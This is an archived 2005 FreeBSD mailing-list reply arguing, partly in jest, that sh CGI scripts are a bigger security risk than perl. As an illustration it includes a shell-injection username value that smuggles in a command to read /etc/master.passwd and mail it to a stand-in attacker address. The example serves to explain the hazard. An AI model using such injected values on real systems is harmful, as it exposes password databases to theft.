From owner-freebsd-questions@FreeBSD.ORG Sat Feb 5 03:44:46 2005 Return-Path: Delivered-To: freebsd-questions@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 69F8016A4CE for ; Sat, 5 Feb 2005 03:44:46 +0000 (GMT) Received: from hosea.tallye.com (joel.tallye.com [216.99.199.78]) by mx1.FreeBSD.org (Postfix) with ESMTP id 72FB043D55 for ; Sat, 5 Feb 2005 03:44:45 +0000 (GMT) (envelope-from lorenl@alzatex.com) Received: from hosea.tallye.com (hosea.tallye.com [127.0.0.1]) by hosea.tallye.com (8.12.8/8.12.10) with ESMTP id j153ifGf016312 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO); Fri, 4 Feb 2005 19:44:42 -0800 Received: (from sttng359@localhost) by hosea.tallye.com (8.12.8/8.12.10/Submit) id j153iegP016309; Fri, 4 Feb 2005 19:44:40 -0800 X-Authentication-Warning: hosea.tallye.com: sttng359 set sender to lorenl@alzatex.com using -f Date: Fri, 4 Feb 2005 19:44:40 -0800 From: "Loren M. Lang" To: Gert Cuykens Message-ID: <20050205034440.GF8619@alzatex.com> References: <200501242315.12888.donaldj1066@fastmail.fm> <200501251530.06424.shinjii@virusinfo.rdksupportinc.com> <20050125055301.GB16896@xor.obsecurity.org> <20050125194736.GD76109@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.4.1i X-GPG-Key: ftp://ftp.tallye.com/pub/lorenl_pubkey.asc X-GPG-Fingerprint: B3B9 D669 69C9 09EC 1BCD 835A FAF3 7A46 E4A3 280C cc: freebsd-questions@freebsd.org cc: Paul Schmehl cc: "Donald J. O'Neill" cc: Warren cc: Kris Kennaway Subject: Re: perl and ports X-BeenThere: freebsd-questions@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: User questions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 05 Feb 2005 03:44:46 -0000 On Tue, Jan 25, 2005 at 11:41:56PM +0100, Gert Cuykens wrote: > ps who is the imake developer ? > > Believe me i am going to mail every developer where perl comes in > between me and the application :P Actually, I think you should work on sh first, it's a much bigger security hazard than perl. If you've ever written much sh, you'd realize with it's much loser syntax, it's easy to get into trouble. At least perl provides use strict and -Tw. Someone using sh to write cgi scripts is the worst. Imagine someone writing the following like for a sh cgi script where $USERNAME is a cgi paramater passed into the following script: echo "Welcome, " $USERNAME "" What if someone wrote the following username and apache was running as root: charlie; cat /etc/master.passwd | mail haZ0rZ@deathtoyou.com; echo Well, they would just of gotten a hold of your entire database of usernames and password and you'd never know about it. So therefore sh is a MUCH bigger security risk and we should work on removing it as a requirement of EVERY single app that currently uses it so we don't have to worry about it being installed. > > I dont want perl , i know it can do great things but i dont want it. > Its a bit like internet explorer browser or msn messenger in windows. > I just want a windows not a browser or a messenger. > > I want a freebsd with cvsup x11 and a gnome-lite desktop. Its what i > like about freebsd filosofie you have a house and you can chose your > own freebsd port furniture. For me perl is a closet that i dont want > because it doesnt go well with my php painting and my apache carpet. > _______________________________________________ > freebsd-questions@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-questions > To unsubscribe, send any mail to "freebsd-questions-unsubscribe@freebsd.org" -- I sense much NT in you. NT leads to Bluescreen. Bluescreen leads to downtime. Downtime leads to suffering. NT is the path to the darkside. Powerful Unix is. Public Key: ftp://ftp.tallye.com/pub/lorenl_pubkey.asc Fingerprint: B3B9 D669 69C9 09EC 1BCD 835A FAF3 7A46 E4A3 280C